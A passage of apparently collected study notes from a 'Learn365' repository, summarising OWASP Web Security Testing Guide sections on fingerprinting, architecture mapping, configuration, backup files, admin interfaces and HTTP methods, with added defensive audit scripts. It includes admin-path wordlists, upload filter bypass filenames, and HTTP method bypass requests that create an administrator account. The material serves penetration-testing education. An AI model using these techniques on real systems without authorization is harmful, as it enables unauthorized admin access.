2. Cookies - Identifying a web framework by the Cookies field in the HTTP request header, but it is possible to change the name of cookies.
3. HTML Source Code
4. Specific Files and Folders - Use directory brute forcing on a target with known folder and filenames and monitoring HTTP-responses to enumerate server content.
5. File Extensions : Here are some common web file extensions and associated technologies:
.php – PHP
.aspx – Microsoft ASP.NET
.jsp – Java Server Pages
6. Error Messages
You can see the Error Messages on the Web page
✅ Tools
1. WhatWeb
2. Wappalyzer
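One way to verify the remediation from 4.1.2 and the header, cookie and file-extension indicators listed above on your own application: flag every response field that names the server version or the framework. This is an added example, not from the original notes or from OWASP; the sample responses and function names are constructed, and the cookie table holds well-known default session cookie names.

```python
import re

# Constructed sample responses: the same page before and after hardening.
BEFORE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Set-Cookie: PHPSESSID=k3v9q0; path=/; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)
AFTER = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: sid=k3v9q0; path=/; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)

# Default session cookie names that reveal the framework behind them.
COOKIE_HINTS = {
    "phpsessid": "PHP",
    "jsessionid": "Java",
    "asp.net_sessionid": "Microsoft ASP.NET",
    "laravel_session": "Laravel",
    "cakephp": "CakePHP",
}
# File extensions listed in the notes above.
EXTENSION_HINTS = {".php": "PHP", ".aspx": "Microsoft ASP.NET", ".jsp": "Java Server Pages"}
# Headers whose presence alone names the technology.
DISCLOSING_HEADERS = {"x-powered-by", "x-aspnet-version", "x-aspnetmvc-version"}
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")


def parse_headers(raw_response):
    """Return [(name, value), ...] from a raw HTTP response, keeping duplicates."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:        # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers


def audit_response(raw_response, request_path="/"):
    """Return [(kind, detail)] for everything that fingerprints the server or framework."""
    findings = []
    for name, value in parse_headers(raw_response):
        lname = name.lower()
        if lname == "server" and VERSION_RE.search(value):
            findings.append(("server-version", value))
        elif lname in DISCLOSING_HEADERS:
            findings.append(("framework-header", f"{name}: {value}"))
        elif lname == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            tech = COOKIE_HINTS.get(cookie.lower())
            if tech:
                findings.append(("default-cookie-name", f"{cookie} -> {tech}"))
    path = request_path.split("?", 1)[0].lower()
    for ext, tech in EXTENSION_HINTS.items():
        if path.endswith(ext):
            findings.append(("file-extension", f"{ext} -> {tech}"))
    return findings


if __name__ == "__main__":
    for label, raw, path in (("before", BEFORE, "/index.php?id=1"), ("after", AFTER, "/account")):
        print(label, audit_response(raw, path))
```

An empty result only means these particular indicators are gone; HTML source, specific files and error messages from the list above still need a manual look.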
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Note- I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 21 Task.md
================================================
🎯 Day 21 Task
✅ 4.1.9 Fingerprint Web Application (Merged into 4.1.8)
✅ THM Room
https://tryhackme.com/room/historyofmalware
✅ 4.1.10 Map Application Architecture
Test Objectives
Understand the architecture of the application and the technologies in use.
How to Test
1. Web Server
Simple applications may run on a single server, which can be identified by Date, Server, Last-Modified, ETag, Accept-Ranges, Content-Length, Connection, Content-Type
2. Platform-as-a-Service (PaaS)
It is possible to identify the use of PaaS, as the application may use a specific domain name (for example, applications deployed on Azure App Services will have a *.azurewebsites.net domain - although they may also use custom domains)
3. Serverless
In a Serverless model, the developers provide code which is run directly on a hosting platform as individual functions, rather than as a traditional larger web application deployed in a webroot.
For example, AWS Lambda functions will typically return the following headers:
X-Amz-Invocation-Type
X-Amz-Log-Type
X-Amz-Client-Context
4. Microservices -
In a microservice-based architecture, the application API is made up of multiple discrete services, rather than running as a monolithic application. The services themselves often run inside containers (normally with Kubernetes), although they are generally behind a single API gateway and domain.
5. Static Storage -
Many applications store static content on dedicated storage platforms, rather than hosting it directly on the main web server. The two most common platforms are Amazon’s S3 Buckets, and Azure’s Storage Accounts, and can be easily identified by the domain names:
1. Amazon S3 Buckets are either BUCKET.s3.amazonaws.com or s3.REGION.amazonaws.com/BUCKET
2. Azure Storage Accounts are ACCOUNT.blob.core.windows.net
6. Database -
a. Port scanning the server and looking for any open ports associated with specific databases.
b. Triggering SQL (or NoSQL) related error messages (or finding existing errors from a search engine).
Other Database -
Windows, IIS and ASP.NET often use Microsoft SQL server.
Embedded systems often use SQLite.
PHP often uses MySQL or PostgreSQL.
APEX often uses Oracle.
7. Authentication
a. Web server configuration
b. Local user accounts in a database.
c. An existing central authentication source such as Active Directory or an LDAP server
d. Single Sign-On (SSO) with either an internal or external provider.
8. Third Party Services and APIs
Almost all web applications include third party resources that are loaded or interacted with by the client. These can include:
a. Active content (such as scripts, style sheets, fonts, and iframes).
b. Passive content (such as images and videos).
c. External APIs.
d. Social media buttons.
e. Advertising networks.
f. Payment gateways.
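The static storage domain patterns and the active/passive split described above can be combined into a small inventory of a page's external resources. This is an added example, not part of the original notes or the OWASP guide; the sample HTML, host names and function names are constructed, and only the domain patterns listed in these notes are recognised.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# tag -> (content kind from the list above, attribute that holds the URL)
URL_ATTRS = {
    "script": ("active", "src"),
    "link": ("active", "href"),
    "iframe": ("active", "src"),
    "img": ("passive", "src"),
    "video": ("passive", "src"),
}


def classify(url):
    """Map a URL to (platform, resource name) using the patterns in the notes."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    segments = [s for s in parts.path.split("/") if s]
    m = re.fullmatch(r"(?P<bucket>.+)\.s3\.amazonaws\.com", host)
    if m:  # BUCKET.s3.amazonaws.com
        return "Amazon S3 bucket", m["bucket"]
    if re.fullmatch(r"s3\.[a-z0-9-]+\.amazonaws\.com", host):
        # s3.REGION.amazonaws.com/BUCKET: the bucket is the first path segment
        return "Amazon S3 bucket", segments[0] if segments else None
    m = re.fullmatch(r"(?P<account>[a-z0-9]+)\.blob\.core\.windows\.net", host)
    if m:
        return "Azure Storage Account", m["account"]
    m = re.fullmatch(r"(?P<app>[a-z0-9-]+)\.azurewebsites\.net", host)
    if m:
        return "Azure App Services (PaaS)", m["app"]
    return "unclassified", host


class ResourceCollector(HTMLParser):
    """Collect resources that are loaded from hosts other than the site itself."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag not in URL_ATTRS:
            return
        kind, attr = URL_ATTRS[tag]
        url = dict(attrs).get(attr)
        host = urlsplit(url).hostname if url else None
        if host and host.lower() != self.site_host:
            platform, name = classify(url)
            self.found.append((kind, platform, name))


def inventory(html, site_host):
    collector = ResourceCollector(site_host)
    collector.feed(html)
    return collector.found


# Constructed sample page for www.example.com
SAMPLE_HTML = """
<script src="https://assets-example.s3.amazonaws.com/app.js"></script>
<link rel="stylesheet" href="https://s3.eu-west-1.amazonaws.com/example-static/site.css">
<img src="https://examplemedia.blob.core.windows.net/images/logo.png">
<iframe src="https://example-widget.azurewebsites.net/embed"></iframe>
<img src="/local/banner.png">
<script src="https://cdn.example.net/lib.js"></script>
"""

if __name__ == "__main__":
    for kind, platform, name in inventory(SAMPLE_HTML, "www.example.com"):
        print(f"{kind:8} {platform:28} {name}")
```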
Network Components
1. Reverse Proxy
a. Acting as a load balancer or web application firewall.
b. Allowing multiple applications to be hosted on a single IP address or domain (in subfolders).
c. Implementing IP filtering or other restrictions.
d. Caching content from the back end to improve performance.
It is not always possible to detect a reverse proxy (especially if there is only one application behind it), but you can sometimes identify it by:
a. A mismatch between the front end server and the back end application (such as a Server: nginx header with an ASP.NET application). This can sometimes lead to request smuggling vulnerabilities.
b. Duplicate headers (especially the Server header).
c. Multiple applications hosted on the same IP address or domain (especially if they use different languages).
Load Balancer
Load balancers can be difficult to detect, but can sometimes be identified by making multiple requests and examining the responses for differences, such as:
a. Inconsistent system times.
b. Different internal IP addresses or hostnames in detailed error messages.
c. Different addresses returned from Server-Side Request Forgery (SSRF).
Content Delivery Network (CDN)
When testing a site behind a CDN, you should bear in mind the following points:
a. The IPs and servers belong to the CDN provider, and are likely to be out of scope for infrastructure testing.
b. Many CDNs also include features like bot detection, rate limiting, and web application firewalls.
c. CDNs usually cache content, so any changes made to the back end website may not appear immediately.
Security Components
1. Network Firewall
Most web servers will be protected by a packet filtering or stateful inspection firewall, which blocks any network traffic that is not required. To detect this, perform a port scan of the server and examine the results.
2. Web Application Firewall (WAF)
A WAF can be deployed in multiple locations, including:
a. On the web server itself.
b. On a separate virtual machine or hardware appliance.
c. In the cloud in front of the back end server.
If a cloud-based WAF is in use, then it may be possible to bypass it by directly accessing the back end server, using the same methods discussed in the Content Delivery Network section.
Github Repo
https://github.com/Imran407704/Learn365
Note - I am making notes from the official OWASP website; you can check it here:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 22 Task.md
================================================
🎯 Day 22 Task
✅ 4.1.10 Map Application Architecture (Completed)
✅ THM Room
https://tryhackme.com/room/investigatingwindows
✅ 4.2 Configuration and Deployment Management Testing
Test Objectives
1. Review the applications’ configurations set across the network and validate that they are not vulnerable.
2. Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.
Read the website for better understanding !
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/01-Test_Network_Infrastructure_Configuration
Note - I am making notes from the official OWASP website; you can check it here:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 23 Task.md
================================================
🎯 Day 23 Task
✅ THM Room
https://tryhackme.com/room/attacktivedirectory
✅ 4.2.2 Test Application Platform Configuration
Test Objectives
1. Ensure that defaults and known files have been removed.
2. Validate that no debugging code or extensions are left in the production environments.
3. Review the logging mechanisms set in place for the application.
How to Test
Black-Box Testing
Sample and Known Files and Directories
Many web servers and application servers provide, in a default installation, sample applications and files for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have been later known to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed)
Comment Review -
It is very common for programmers to add comments when developing large web-based applications. However, comments included inline in HTML code might reveal internal information that should not be available to an attacker. Sometimes, even source code is commented out since a functionality is no longer required, but this comment is leaked out to the HTML pages returned to the users unintentionally.
System Configuration -
Various tools, documents, or checklists can be used to give IT and security professionals a detailed assessment of target systems’ conformance to various configuration baselines or benchmarks.
Gray-Box Testing
Configuration Review -
The web server or application server configuration takes an important role in protecting the contents of the site and it must be carefully reviewed in order to spot common configuration mistakes.
It is impossible to generically say how a server should be configured, however, some common guidelines should be taken into account:
1. Make sure the server software properly logs both legitimate access and errors.
2. Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks. Ensure that the server has been performance-tuned properly.
3. Never grant non-administrative identities (with the exception of NT SERVICE\WMSvc) access to applicationHost.config, redirection.config, and administration.config (either Read or Write access). This includes Network Service, IIS_IUSRS, IUSR, or any custom identity used by IIS application pools. IIS worker processes are not meant to access any of these files directly.
4. Never share out applicationHost.config, redirection.config, and administration.config on the network. When using Shared Configuration, prefer to export applicationHost.config to another location (see the section titled “Setting Permissions for Shared Configuration”).
5. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. Do not store sensitive information in these files if it should be for administrator eyes only.
6. Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config. This identity should have only Read access.
Logging
Logging is an important asset of the security of an application architecture, since it can be used to detect flaws in applications (users constantly trying to retrieve a file that does not really exist) as well as sustained attacks from rogue users.
1. Do the logs contain sensitive information?
2. Are the logs stored in a dedicated server?
3. Can log usage generate a Denial of Service condition?
4. How are they rotated? Are logs kept for sufficient time?
5. How are logs reviewed? Can administrators use these reviews to detect targeted attacks?
6. How are log backups preserved?
7. Is the data being logged validated (min/max length, chars etc) prior to being logged?
Sensitive Information in Logs
Some applications might, for example, use GET requests to forward form data which will be seen in the server logs. This means that server logs might contain sensitive information (such as usernames and passwords, or bank account details). This sensitive information can be misused by an attacker if they obtained the logs, for example, through administrative interfaces or known web server vulnerabilities or misconfiguration (like the well-known server-status misconfiguration in Apache-based HTTP servers).
Event logs will often contain data that is useful to an attacker (information leakage) or can be used directly in exploits:
Debug information, Stack traces, Usernames, System component names, Internal IP addresses, Less sensitive personal data (e.g. email addresses, postal addresses and telephone numbers associated with named individuals), Business data
Also, in some jurisdictions, storing some sensitive information in log files, such as personal data, might oblige the enterprise to apply the data protection laws that they would apply to their back-end databases to log files too. And failure to do so, even unknowingly, might carry penalties under the data protection laws that apply.
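One way to review access logs for form data that was forwarded in GET requests, as described above. This is an added example, not part of the original notes or the OWASP guide; the log lines are constructed, and the list of sensitive parameter names is an assumption to adapt to the application under review.

```python
import re
from urllib.parse import urlsplit, parse_qsl, urlencode

# Parameter names treated as sensitive (assumed list, extend per application).
SENSITIVE_KEYS = {"password", "passwd", "pwd", "token", "account", "iban", "ssn"}

# The request field of an Apache/nginx "combined" access log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"')


def audit_line(line):
    """Return (sensitive parameter names, redacted copy) for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return [], line
    parts = urlsplit(m.group("target"))
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    hits = [k for k, _ in pairs if k.lower() in SENSITIVE_KEYS]
    if not hits:
        return [], line
    redacted_query = urlencode(
        [(k, "REDACTED" if k.lower() in SENSITIVE_KEYS else v) for k, v in pairs]
    )
    redacted_target = parts._replace(query=redacted_query).geturl()
    start, end = m.span("target")
    return hits, line[:start] + redacted_target + line[end:]


def audit(lines):
    """Return (line number, parameter names, redacted line) for every finding."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits, redacted = audit_line(line)
        if hits:
            findings.append((number, hits, redacted))
    return findings


# Constructed sample log lines (documentation IP ranges, made-up values).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] '
    '"GET /login?user=alice&password=hunter2 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] '
    '"GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] '
    '"GET /transfer?account=12345678&amount=50 HTTP/1.1" 200 87 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for number, hits, redacted in audit(SAMPLE_LOG):
        print(f"line {number}: sensitive parameters {hits}")
        print(f"  redacted: {redacted}")
```

A finding here means the application should move that form to POST and that the existing log files need the same protection as the data they now contain.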
Log Location
Typically servers will generate local logs of their actions and errors, consuming the disk of the system the server is running on. However, if the server is compromised its logs can be wiped out by the intruder to clean up all the traces of its attack and methods. If this were to happen the system administrator would have no knowledge of how the attack occurred or where the attack source was located. Actually, most attacker tool kits include a ‘log zapper’ that is capable of cleaning up any logs that hold given information (like the IP address of the attacker) and are routinely used in attacker’s system-level root kits.
Log Storage
Logs can introduce a Denial of Service condition if they are not properly stored. Any attacker with sufficient resources could be able to produce a sufficient number of requests that would fill up the allocated space to log files, if they are not specifically prevented from doing so. However, if the server is not properly configured, the log files will be stored in the same disk partition as the one used for the operating system software or the application itself. This means that if the disk were to be filled up the operating system or the application might fail because it is unable to write on disk.
Log Rotation
Most servers (but few custom applications) will rotate logs in order to prevent them from filling up the file system they reside on. The assumption when rotating logs is that the information in them is only necessary for a limited amount of time.
This feature should be tested in order to ensure that:
1. Logs are kept for the time defined in the security policy, not more and not less.
2. Logs are compressed once rotated (this is a convenience, since it will mean that more logs will be stored for the same available disk space).
3. File system permissions of rotated log files are the same as (or stricter than) those of the log files themselves. For example, web servers will need to write to the logs they use but they don’t actually need to write to rotated logs, which means that the permissions of the files can be changed upon rotation to prevent the web server process from modifying these.
Log Access Control
Event log information should never be visible to end users. Even web administrators should not be able to see such logs since it breaks separation of duty controls. Ensure that any access control schema that is used to protect access to raw logs and any applications providing capabilities to view or search the logs is not linked with access control schemas for other application user roles. Neither should any log data be viewable by unauthenticated users.
Note - I am making notes from the official OWASP website; you can check it here:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 24 Task.md
================================================
🎯 Day 24 Task
✅ THM Room
https://tryhackme.com/room/vulnversity
✅ 4.2.3 Test File Extensions Handling for Sensitive Information
Test Objectives
1. Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.).
2. Validate that no system framework bypasses exist on the rules set.
How to Test
Forced Browsing
Submit requests with different file extensions and verify how they are handled. The verification should be on a per web directory basis. Verify directories that allow script execution. Web server directories can be identified by scanning tools which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application.
If the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy, depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web or application servers. This may happen if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behavior between them, and possibly different vulnerabilities).
Example
The tester has identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:
```
<?
mysql_connect("127.0.0.1", "root", "password")
or die("Could not connect");
?>
```
The following file extensions should never be returned by a web server, since they are related to files which may contain sensitive information or to files for which there is no reason to be served.
File Upload
1. file.phtml gets processed as PHP code.
2. FILE~1.PHT is served, but not processed by the PHP ISAPI handler.
3. shell.phPWND can be uploaded.
4. SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler.
Gray-Box Testing
Performing white-box testing against file extensions handling amounts to checking the configurations of web servers or application servers taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behavior.
✅ Tools
HTTrack
wget
curl
Note - I am making notes from the official OWASP website; you can check it here:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 25 Task.md
================================================
🎯 Day 25 Task
✅ THM Room
https://tryhackme.com/room/principlesofsecurity
✅ 4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information
Test Objectives
Find and analyse unreferenced files that might contain sensitive information.
How to Test
Black-Box Testing
Inference from the Naming Scheme Used for Published Content
Enumerate all of the application’s pages and functionality. This can be done manually using a browser, or using an application spidering tool. Most applications use a recognizable naming scheme, and organize resources into pages and directories using words that describe their function. From the naming scheme used for published content, it is often possible to infer the name and location of unreferenced pages. For example, if a page viewuser.asp is found, then look also for edituser.asp, adduser.asp and deleteuser.asp. If a directory /app/user is found, then look also for /app/admin and /app/manager
Other Clues in Published Content
Many web applications leave clues in published content that can lead to the discovery of hidden pages and functionality. These clues often appear in the source code of HTML and JavaScript files. The source code for all published content should be manually reviewed to identify clues about other pages and functionality. For example:
Programmers’ comments and commented-out sections of source code may refer to hidden content:
```
<!-- <A HREF="uploadfile.jsp">Upload a document to the server</A> -->
<!-- Link removed while bugs in uploadfile.jsp are fixed -->
```
JavaScript may contain page links that are only rendered within the user’s GUI under certain circumstances:
```
var adminUser=false;
if (adminUser) menu.add (new menuItem ("Maintain users", "/admin/useradmin.jsp"));
```
HTML pages may contain FORMs that have been hidden by disabling the SUBMIT element:
```
<form action="forgotPassword.jsp" method="post">
<input type="hidden" name="userID" value="123">
<!-- <input type="submit" value="Forgot Password"> -->
</form>
```
Another source of clues about unreferenced directories is the /robots.txt file used to provide instructions to web robots:
```
User-agent: *
Disallow: /Admin
Disallow: /uploads
Disallow: /backup
Disallow: /~jbloggs
Disallow: /include
```
Blind Guessing
1. Identify the file extensions in use within known areas of the application (e.g. jsp, aspx, html), and use a basic wordlist appended with each of these extensions (or use a longer list of common extensions if resources permit).
2. For each file identified through other enumeration techniques, create a custom wordlist derived from that filename. Get a list of common file extensions (including ~, bak, txt, src, dev, old, inc, orig, copy, tmp, swp, etc.) and use each extension before, after, and instead of, the extension of the actual filename
Information Obtained Through Server Vulnerabilities and Misconfiguration
The most obvious way in which a misconfigured server may disclose unreferenced pages is through directory listing. Request all enumerated directories to identify any which provide a directory listing.
1. Apache ?M=D directory listing vulnerability.
2. Various IIS script source disclosure vulnerabilities.
3. IIS WebDAV directory listing vulnerabilities.
Use of Publicly Available Information
Pages that used to be referenced may still appear in the archives of Internet search engines. For example, 1998results.asp may no longer be linked from a company’s website, but may remain on the server and in search engine databases. This old script may contain vulnerabilities that could be used to compromise the entire site. The site: Google search operator may be used to run a query only against the domain of choice, such as in: site:www.example.com. Using search engines in this way has led to a broad array of techniques which you may find useful and that are described in the Google Hacking section of this Guide. Check it to hone your testing skills via Google. Backup files are not likely to be referenced by any other files and therefore may have not been indexed by Google, but if they lie in browsable directories the search engine might know about them.
Filename Filter Bypass
Because deny list filters are based on regular expressions, one can sometimes take advantage of obscure OS filename expansion features which work in ways the developer didn’t expect. The tester can sometimes exploit differences in the ways that filenames are parsed by the application, web server, and underlying OS and its filename conventions.
1. Remove incompatible characters
2. Convert spaces to underscores
3. Take the first six characters of the basename
4. Add ~<digit> which is used to distinguish files with names using the same six initial characters
5. This convention changes after the first 3 name collisions
6. Truncate file extension to three characters
7. Make all the characters uppercase
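The seven steps above are the Windows 8.3 short-name convention, and a filter that inspects only the long name misses the alias. The following added example (not part of the original notes or the OWASP guide) is a simplified model that follows the steps as listed, beside a deny-list check that also inspects the alias; the function names and the deny list are constructed, and the scheme used after the collisions in step 5 is not modelled.

```python
import re

# Characters kept in a short name; everything else is removed (step 1).
INCOMPATIBLE = re.compile(r"[^A-Za-z0-9_!#$%&'()\-@^`{}~]")

# Constructed deny list of extensions an upload filter refuses.
DENIED_EXTENSIONS = {"php", "pht", "phtml", "asp", "aspx", "jsp"}


def clean(part):
    # Step 2 (spaces to underscores), then step 1 (drop incompatible characters).
    return INCOMPATIBLE.sub("", part.replace(" ", "_"))


def short_name(filename, digit=1):
    """Derive the 8.3 alias of a long filename following the listed steps."""
    if not 1 <= digit <= 4:
        # Step 5: after the first 3 collisions the convention changes (not modelled).
        raise ValueError("only ~1 to ~4 are modelled")
    base, dot, ext = filename.rpartition(".")
    if not dot:  # no extension at all
        base, ext = filename, ""
    alias = f"{clean(base)[:6]}~{digit}"  # steps 3 and 4
    if ext:
        alias += "." + clean(ext)[:3]  # step 6
    return alias.upper()  # step 7


def extension(name):
    return name.rpartition(".")[2].lower() if "." in name else ""


def naive_filter_allows(filename):
    """Deny list applied to the long name only."""
    return extension(filename) not in DENIED_EXTENSIONS


def hardened_filter_allows(filename):
    """Deny list applied to the long name and to its 8.3 alias."""
    candidates = {extension(filename), extension(short_name(filename))}
    return candidates.isdisjoint(DENIED_EXTENSIONS)


if __name__ == "__main__":
    for name in ("file.phtml", "shell.phPWND", "report.pdf"):
        print(
            f"{name:14} alias={short_name(name):12} "
            f"naive={naive_filter_allows(name)} hardened={hardened_filter_allows(name)}"
        )
```

An allow list of expected extensions is the stronger control, since it rejects shell.phPWND without needing to know about the alias at all.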
Tools
wget
nessus
curl
Note - I am making notes from the official OWASP website; you can check it here:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 26 Task.md
================================================
🎯 Day 26 Task
✅ THM Room
https://tryhackme.com/room/linuxfundamentalspart2
✅ 4.2.5 Enumerate Infrastructure and Application Admin Interfaces
Test Objectives
Identify hidden administrator interfaces and functionality.
How to Test
Black-Box Testing
1. Directory and file enumeration. An administrative interface may be present but not visibly available to the tester. Attempting to guess the path of the administrative interface may be as simple as requesting /admin or /administrator etc., or in some scenarios it can be revealed within seconds using Google dorks.
2. There are many tools available to perform brute forcing of server contents, see the tools section below for more information. A tester may have to also identify the filename of the administration page. Forcibly browsing to the identified page may provide access to the interface.
3. Comments and links in source code. Many sites use common code that is loaded for all site users. By examining all source sent to the client, links to administrator functionality may be discovered and should be investigated.
4. Reviewing server and application documentation. If the application server or application is deployed in its default configuration it may be possible to access the administration interface using information described in configuration or help documentation. Default password lists should be consulted if an administrative interface is found and credentials are required.
5. Publicly available information. Many applications such as WordPress have default administrative interfaces.
6. Alternative server port. Administration interfaces may be seen on a different port on the host than the main application. For example, Apache Tomcat’s Administration interface can often be seen on port 8080.
7. Parameter tampering. A GET or POST parameter or a cookie variable may be required to enable the administrator functionality. Clues to this include the presence of hidden fields such as:
```
<input type="hidden" name="admin" value="no">
```
or in a cookie:
```
Cookie: session_cookie; useradmin=0
```
Once an administrative interface has been discovered, a combination of the above techniques may be used to attempt to bypass authentication. If this fails, the tester may wish to attempt a brute force attack. In such an instance the tester should be aware of the potential for administrative account lockout if such functionality is present.
Gray-Box Testing
Each web framework may have its own admin default pages or path. For example
WebSphere:
```
/admin
/admin-authz.xml
/admin.conf
/admin.passwd
/admin/*
/admin/logon.jsp
/admin/secure/logon.jsp
```
PHP:
```
/phpinfo
/phpmyadmin/
/phpMyAdmin/
/mysqladmin/
/MySQLadmin
/MySQLAdmin
/login.php
/logon.php
/xmlrpc.php
/dbadmin
```
FrontPage:
```
/admin.dll
/admin.exe
/administrators.pwd
/author.dll
/author.exe
/author.log
/authors.pwd
/cgi-bin
```
WebLogic:
```
/AdminCaptureRootCA
/AdminClients
/AdminConnections
/AdminEvents
/AdminJDBC
/AdminLicense
/AdminMain
/AdminProps
/AdminRealm
/AdminThreads
```
WordPress:
```
wp-admin/
wp-admin/about.php
wp-admin/admin-ajax.php
wp-admin/admin-db.php
wp-admin/admin-footer.php
wp-admin/admin-functions.php
wp-admin/admin-header.php
```
Tools
1. BurpSuite/ZAP
2. https://github.com/vanhauser-thc/thc-hydra
Default-Wordlist :- https://cirt.net/passwords
Logins.txt :- https://github.com/fuzzdb-project/fuzzdb/blob/master/discovery/predictable-filepaths/login-file-locations/Logins.txt
Common admin/debugging parameters :- https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt
Note - I am making notes from the official OWASP website; you can check it here:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 27 Task.md
================================================
🎯 Day 27 Task
✅ THM Room
https://tryhackme.com/room/activerecon
✅ Web App Pentesting - HTTP Headers & Methods Video by
https://youtu.be/8q5mc1AEtYo
✅ 4.2.6 Test HTTP Methods
Test Objectives
1. Enumerate supported HTTP methods.
2. Test for access control bypass.
3. Test XST vulnerabilities.
4. Test HTTP method overriding techniques.
How to Test
Discover the Supported Methods
To perform this test, the tester needs some way to figure out which HTTP methods are supported by the web server that is being examined. While the OPTIONS HTTP method provides a direct way to do that, verify the server’s response by issuing requests using different methods. This can be achieved by manual testing or something like the http-methods Nmap script.
To use the http-methods Nmap script to test the endpoint /index.php on the server localhost using HTTPS, issue the command:
```
nmap -p 443 --script http-methods --script-args http-methods.url-path='/index.php' localhost
```
Testing the PUT Method
1. Capture the base request of the target with a web proxy.
2. Change the request method to PUT, add a test.html file as the request body, and send the request to the application server.
```
PUT /test.html HTTP/1.1
Host: testing-website

<html>
HTTP PUT Method is Enabled
</html>
```
3. If the server responds with a 2XX success code or a 3XX redirection and a GET request for test.html then confirms the file exists, the application is vulnerable.
Testing for Access Control Bypass
Find a page to visit that has a security constraint such that a GET request would normally force a 302 redirect to a log in page or force a log in directly. Issue requests using various methods such as HEAD, POST, PUT etc. as well as arbitrarily made up methods such as BILBAO, FOOBAR, CATS, etc. If the web application responds with a HTTP/1.1 200 OK that is not a log in page, it may be possible to bypass authentication or authorization
```
$ ncat www.example.com 80
HEAD /admin HTTP/1.1
Host: www.example.com

HTTP/1.1 200 OK
Date: Mon, 18 Aug 2008 22:44:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=pKi...; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: adminOnlyCookie1=...; expires=Tue, 18-Aug-2009 22:44:31 GMT; domain=www.example.com
Set-Cookie: adminOnlyCookie2=...; expires=Mon, 18-Aug-2008 22:54:31 GMT; domain=www.example.com
Set-Cookie: adminOnlyCookie3=...; expires=Sun, 19-Aug-2007 22:44:30 GMT; domain=www.example.com
Content-Language: EN
Connection: close
Content-Type: text/html; charset=ISO-8859-1
```
If the system appears vulnerable, issue CSRF-like attacks such as the following to exploit the issue more fully:
```
HEAD /admin/createUser.php?member=myAdmin
```
```
PUT /admin/changePw.php?member=myAdmin&passwd=foo123&confirm=foo123
```
```
CATS /admin/groupEdit.php?group=Admins&member=myAdmin&action=add
```
Using the above three commands, modified to suit the application under test and testing requirements, a new user would be created, a password assigned, and the user made an administrator, all using blind request submission
Testing for Cross-Site Tracing Potential
Note: in order to understand the logic and the goals of a cross-site tracing (XST) attack, one must be familiar with cross-site scripting attacks.
